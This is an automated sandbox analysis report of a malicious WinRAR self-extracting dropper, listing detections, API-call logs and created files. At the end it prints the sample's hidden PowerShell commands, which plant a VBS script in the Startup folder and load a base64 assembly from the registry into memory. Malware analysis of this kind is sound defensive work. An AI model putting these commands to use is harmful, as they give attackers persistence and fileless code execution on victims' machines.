12.8
0-day
46 个模型检测该样本为恶意!
重新分析
更多

702221e0753dc7bdae96ab782721c0e3a58d5d51d15f74af56c662f92f120125

a6f7c0e5ca9c0851ca59d54ef99d49ce.exe

分析耗时

116s

最近分析

文件大小

128.2KB
静态报毒 动态报毒 AI SCORE=88 ARTEMIS CONFIDENCE DHEM DOWNLOADER33 EXPKIT FHFKUA GENERICKD HIGH CONFIDENCE KCLOUD LJ0FFSRMCOC MALWARE@#2YKFO27WO1516 NEMUCOD SCORE TOPIS UNSAFE YHIEN YMACCO 更多
鹰眼引擎
未检测 暂无鹰眼引擎检测结果
静态判定
反病毒引擎
查杀引擎 查杀结果 查杀时间 查杀版本
McAfee Artemis!A6F7C0E5CA9C 20201211 6.0.6.653
CrowdStrike win/malicious_confidence_60% (W) 20190702 1.0
Baidu JS.Trojan-Downloader.Nemucod.yi 20190318 1.0.0.2
Avast Other:Malware-gen [Trj] 20201210 21.1.5827.0
Alibaba Trojan:VBS/Injector.d61e6008 20190527 0.3.0.5
Kingsoft Win32.Troj.Undef.(kcloud) 20201211 2017.9.26.565
Tencent 20201211 1.0.0.1
静态指标
Queries for the computername (25 个事件)
Time & API Arguments Status Return Repeated
1619832777.718626
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1619832777.749626
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1619832777.781626
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1619832777.796626
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1619832783.062626
GetComputerNameA
computer_name: OSKAR-PC
success 1 0
1619832783.062626
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1619832788.828249
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1619832788.874249
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1619832788.890249
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1619832788.968249
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1619832795.249249
GetComputerNameA
computer_name: OSKAR-PC
success 1 0
1619832795.249249
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1619832789.124249
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1619832789.156249
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1619832789.187249
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1619832789.187249
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1619832796.515249
GetComputerNameA
computer_name: OSKAR-PC
success 1 0
1619832796.515249
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1619832792.046876
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1619832792.468876
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1619832792.499876
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1619832792.499876
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1619832796.906876
GetComputerNameA
computer_name: OSKAR-PC
success 1 0
1619832796.906876
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1619832798.328876
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
Checks if process is being debugged by a debugger (4 个事件)
Time & API Arguments Status Return Repeated
1619832778.453626
IsDebuggerPresent
failed 0 0
1619832791.265249
IsDebuggerPresent
failed 0 0
1619832791.187249
IsDebuggerPresent
failed 0 0
1619832793.406876
IsDebuggerPresent
failed 0 0
Command line console output was observed (12 个事件)
Time & API Arguments Status Return Repeated
1619832784.249626
WriteConsoleW
buffer: PS C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\RarSFX2>
console_handle: 0x0000000f
success 1 0
1619832796.968249
WriteConsoleW
buffer: PSPath : Microsoft.PowerShell.Core\Registry::HKEY_CURRENT_USER\Software\M
console_handle: 0x0000001f
success 1 0
1619832796.999249
WriteConsoleW
buffer: icrosoft\Windows\CurrentVersion\Run
console_handle: 0x00000023
success 1 0
1619832797.281249
WriteConsoleW
buffer: PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_CURRENT_USER\Software\M
console_handle: 0x00000027
success 1 0
1619832797.296249
WriteConsoleW
buffer: icrosoft\Windows\CurrentVersion
console_handle: 0x0000002b
success 1 0
1619832797.312249
WriteConsoleW
buffer: PSChildName : Run
console_handle: 0x0000002f
success 1 0
1619832797.312249
WriteConsoleW
buffer: PSDrive : HKCU
console_handle: 0x00000033
success 1 0
1619832797.312249
WriteConsoleW
buffer: PSProvider : Microsoft.PowerShell.Core\Registry
console_handle: 0x00000037
success 1 0
1619832797.328249
WriteConsoleW
buffer: microsoft : C:\Users\Administrator.Oskar-PC\AppData\Roaming\microsoft.vbs
console_handle: 0x0000003b
success 1 0
1619832797.406249
WriteConsoleW
buffer: PS C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\RarSFX2>
console_handle: 0x0000000f
success 1 0
1619832797.281249
WriteConsoleW
buffer: PS C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\RarSFX2>
console_handle: 0x0000000f
success 1 0
1619832798.093876
WriteConsoleW
buffer: PS C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\RarSFX2>
console_handle: 0x0000000f
success 1 0
Uses Windows APIs to generate a cryptographic key (50 out of 234 个事件)
Time & API Arguments Status Return Repeated
1619832780.203626
CryptExportKey
crypto_handle: 0x004ae460
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619832781.499626
CryptExportKey
crypto_handle: 0x004aece0
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619832781.499626
CryptExportKey
crypto_handle: 0x004aece0
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619832781.499626
CryptExportKey
crypto_handle: 0x004aece0
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619832781.562626
CryptExportKey
crypto_handle: 0x004aece0
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619832781.562626
CryptExportKey
crypto_handle: 0x004aece0
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619832781.562626
CryptExportKey
crypto_handle: 0x004aece0
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619832781.578626
CryptExportKey
crypto_handle: 0x004aece0
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619832781.624626
CryptExportKey
crypto_handle: 0x004aef20
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619832781.624626
CryptExportKey
crypto_handle: 0x004aef20
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619832781.656626
CryptExportKey
crypto_handle: 0x004aef20
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619832781.656626
CryptExportKey
crypto_handle: 0x004aef20
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619832781.656626
CryptExportKey
crypto_handle: 0x004aef20
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619832781.656626
CryptExportKey
crypto_handle: 0x004aef20
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619832782.140626
CryptExportKey
crypto_handle: 0x004aeba0
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619832782.140626
CryptExportKey
crypto_handle: 0x004aeba0
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619832782.140626
CryptExportKey
crypto_handle: 0x004aeba0
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619832782.156626
CryptExportKey
crypto_handle: 0x004aeba0
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619832782.156626
CryptExportKey
crypto_handle: 0x004aeba0
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619832782.156626
CryptExportKey
crypto_handle: 0x004aeba0
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619832782.187626
CryptExportKey
crypto_handle: 0x004aeba0
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619832782.718626
CryptExportKey
crypto_handle: 0x004ae520
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619832782.718626
CryptExportKey
crypto_handle: 0x004ae520
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619832782.718626
CryptExportKey
crypto_handle: 0x004ae520
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619832782.718626
CryptExportKey
crypto_handle: 0x004ae8e0
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619832782.718626
CryptExportKey
crypto_handle: 0x004ae520
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619832782.718626
CryptExportKey
crypto_handle: 0x004ae520
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619832782.718626
CryptExportKey
crypto_handle: 0x004ae520
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619832782.718626
CryptExportKey
crypto_handle: 0x004ae520
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619832782.734626
CryptExportKey
crypto_handle: 0x004ae520
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619832782.749626
CryptExportKey
crypto_handle: 0x004ae520
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619832782.749626
CryptExportKey
crypto_handle: 0x004ae520
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619832782.812626
CryptExportKey
crypto_handle: 0x004ae520
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619832782.812626
CryptExportKey
crypto_handle: 0x004ae520
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619832782.890626
CryptExportKey
crypto_handle: 0x004ae9a0
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619832782.890626
CryptExportKey
crypto_handle: 0x004ae9a0
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619832782.890626
CryptExportKey
crypto_handle: 0x004ae9a0
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619832782.906626
CryptExportKey
crypto_handle: 0x004ae9a0
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619832782.906626
CryptExportKey
crypto_handle: 0x004ae9a0
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619832782.906626
CryptExportKey
crypto_handle: 0x004ae9a0
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619832782.921626
CryptExportKey
crypto_handle: 0x004ae9a0
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619832782.999626
CryptExportKey
crypto_handle: 0x004ae760
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619832782.999626
CryptExportKey
crypto_handle: 0x004ae760
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619832783.140626
CryptExportKey
crypto_handle: 0x004ae760
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619832783.140626
CryptExportKey
crypto_handle: 0x004ae760
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619832783.156626
CryptExportKey
crypto_handle: 0x004ae760
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619832783.156626
CryptExportKey
crypto_handle: 0x004ae760
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619832783.156626
CryptExportKey
crypto_handle: 0x004ae760
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619832783.156626
CryptExportKey
crypto_handle: 0x004ae760
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619832783.156626
CryptExportKey
crypto_handle: 0x004ae760
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
This executable has a PDB path (1 个事件)
pdb_path d:\Projects\WinRAR\SFX\build\sfxrar32\Release\sfxrar.pdb
Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 个事件)
Time & API Arguments Status Return Repeated
1619832775.437626
GlobalMemoryStatusEx
success 1 0
行为判定
动态指标
Performs some HTTP requests (3 个事件)
request HEAD http://redirector.gvt1.com/edgedl/release2/update2/AIUdiWYcaIvMz1IBNCM0PPo_1.3.36.82/GoogleUpdateSetup.exe
request HEAD http://r1---sn-j5o76n7e.gvt1.com/edgedl/release2/update2/AIUdiWYcaIvMz1IBNCM0PPo_1.3.36.82/GoogleUpdateSetup.exe?cms_redirect=yes&mh=ms&mip=202.100.214.105&mm=28&mn=sn-j5o76n7e&ms=nvh&mt=1619803697&mv=m&mvi=1&pl=23&shardbypass=yes
request HEAD http://r4---sn-j5o76n7l.gvt1.com/edgedl/release2/update2/AIUdiWYcaIvMz1IBNCM0PPo_1.3.36.82/GoogleUpdateSetup.exe?mh=ms&mvi=4&pl=17&shardbypass=yes&redirect_counter=1&rm=sn-j5oe7e&req_id=74ddce77771dfc27&cms_redirect=yes&ipbypass=yes&mip=59.50.85.28&mm=28&mn=sn-j5o76n7l&ms=nvh&mt=1619803937&mv=m
Allocates read-write-execute memory (usually to unpack itself) (50 out of 658 个事件)
Time & API Arguments Status Return Repeated
1619826879.729503
NtProtectVirtualMemory
process_identifier: 368
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x75121000
success 0 0
1619826879.901503
NtProtectVirtualMemory
process_identifier: 368
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x75101000
success 0 0
1619826880.744503
NtProtectVirtualMemory
process_identifier: 368
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x74f81000
success 0 0
1619826880.822503
NtProtectVirtualMemory
process_identifier: 368
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x74811000
success 0 0
1619826880.838503
NtProtectVirtualMemory
process_identifier: 368
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x76881000
success 0 0
1619826881.151503
NtProtectVirtualMemory
process_identifier: 368
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x75a11000
success 0 0
1619826881.151503
NtProtectVirtualMemory
process_identifier: 368
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x766c1000
success 0 0
1619826881.151503
NtProtectVirtualMemory
process_identifier: 368
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x77691000
success 0 0
1619832773.656249
NtProtectVirtualMemory
process_identifier: 324
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x747b1000
success 0 0
1619832773.671249
NtProtectVirtualMemory
process_identifier: 324
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x75101000
success 0 0
1619832773.749249
NtProtectVirtualMemory
process_identifier: 324
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x75c41000
success 0 0
1619832773.749249
NtProtectVirtualMemory
process_identifier: 324
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x76121000
success 0 0
1619832773.765249
NtProtectVirtualMemory
process_identifier: 324
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x74721000
success 0 0
1619832773.828249
NtProtectVirtualMemory
process_identifier: 324
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x746d1000
success 0 0
1619832773.953249
NtProtectVirtualMemory
process_identifier: 324
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x746b1000
success 0 0
1619832773.953249
NtProtectVirtualMemory
process_identifier: 324
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x74621000
success 0 0
1619832774.156249
NtProtectVirtualMemory
process_identifier: 324
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x74f81000
success 0 0
1619832774.156249
NtProtectVirtualMemory
process_identifier: 324
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x75391000
success 0 0
1619832774.390249
NtProtectVirtualMemory
process_identifier: 324
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x77711000
success 0 0
1619832774.390249
NtProtectVirtualMemory
process_identifier: 324
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x76241000
success 0 0
1619832774.562249
NtProtectVirtualMemory
process_identifier: 324
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x75a11000
success 0 0
1619832774.562249
NtProtectVirtualMemory
process_identifier: 324
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x766c1000
success 0 0
1619832774.562249
NtProtectVirtualMemory
process_identifier: 324
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x77691000
success 0 0
1619832774.656249
NtProtectVirtualMemory
process_identifier: 324
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x74811000
success 0 0
1619832774.656249
NtProtectVirtualMemory
process_identifier: 324
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x76881000
success 0 0
1619832775.421626
NtProtectVirtualMemory
process_identifier: 2984
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x75a11000
success 0 0
1619832775.421626
NtProtectVirtualMemory
process_identifier: 2984
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x766c1000
success 0 0
1619832775.421626
NtProtectVirtualMemory
process_identifier: 2984
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x77691000
success 0 0
1619832775.453626
NtProtectVirtualMemory
process_identifier: 2984
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x74811000
success 0 0
1619832775.453626
NtProtectVirtualMemory
process_identifier: 2984
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x76881000
success 0 0
1619832777.640626
NtProtectVirtualMemory
process_identifier: 2984
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x74541000
success 0 0
1619832777.671626
NtProtectVirtualMemory
process_identifier: 2984
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x74061000
success 0 0
1619832777.687626
NtProtectVirtualMemory
process_identifier: 2984
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x74521000
success 0 0
1619832777.718626
NtProtectVirtualMemory
process_identifier: 2984
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x74051000
success 0 0
1619832777.812626
NtProtectVirtualMemory
process_identifier: 2984
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x74721000
success 0 0
1619832777.984626
NtProtectVirtualMemory
process_identifier: 2984
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x745b1000
success 0 0
1619832778.015626
NtAllocateVirtualMemory
process_identifier: 2984
region_size: 1638400
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 8192 (MEM_RESERVE)
base_address: 0x02a30000
success 0 0
1619832778.015626
NtAllocateVirtualMemory
process_identifier: 2984
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x02b80000
success 0 0
1619832778.203626
NtProtectVirtualMemory
process_identifier: 2984
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x73aa1000
success 0 0
1619832778.203626
NtProtectVirtualMemory
process_identifier: 2984
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x744a4000
success 0 0
1619832778.343626
NtProtectVirtualMemory
process_identifier: 2984
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x73aa1000
success 0 0
1619832778.468626
NtAllocateVirtualMemory
process_identifier: 2984
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x0207a000
success 0 0
1619832778.468626
NtProtectVirtualMemory
process_identifier: 2984
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 8192
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x73aa2000
success 0 0
1619832778.468626
NtAllocateVirtualMemory
process_identifier: 2984
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x02072000
success 0 0
1619832778.687626
NtAllocateVirtualMemory
process_identifier: 2984
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x02082000
success 0 0
1619832778.781626
NtAllocateVirtualMemory
process_identifier: 2984
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x02b81000
success 0 0
1619832778.828626
NtAllocateVirtualMemory
process_identifier: 2984
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x02b82000
success 0 0
1619832778.968626
NtAllocateVirtualMemory
process_identifier: 2984
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x027ca000
success 0 0
1619832779.234626
NtAllocateVirtualMemory
process_identifier: 2984
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x02083000
success 0 0
1619832779.484626
NtAllocateVirtualMemory
process_identifier: 2984
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x02084000
success 0 0
Checks whether any human activity is being performed by constantly checking whether the foreground window changed
Creates executable files on the filesystem (3 个事件)
file C:\Users\Administrator.Oskar-PC\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\microsoft.vbs
file C:\Users\Administrator.Oskar-PC\AppData\Roaming\microsoft.vbs
file C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\RarSFX2\microsoft.vbs
Creates a shortcut to an executable file (1 个事件)
file C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\RarSFX2\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
Creates a suspicious process (8 个事件)
cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command "[System.IO.File]::WriteAllText([Environment]::GetFolderPath(7)+'\microsoft.vbs',[System.IO.File]::ReadAllText('C:\Users\Administrator.Oskar-PC\AppData\Roaming\microsoft.vbs'))"
cmdline powershell -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command "$_b = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'microsoft').microsoft;$_b=$_b.replace('@','0');[byte[]]$_0 = [System.Convert]::FromBase64String($_b);$_1 = [System.Threading.Thread]::GetDomain().Load($_0);$_1.EntryPoint.invoke($null,$null);"
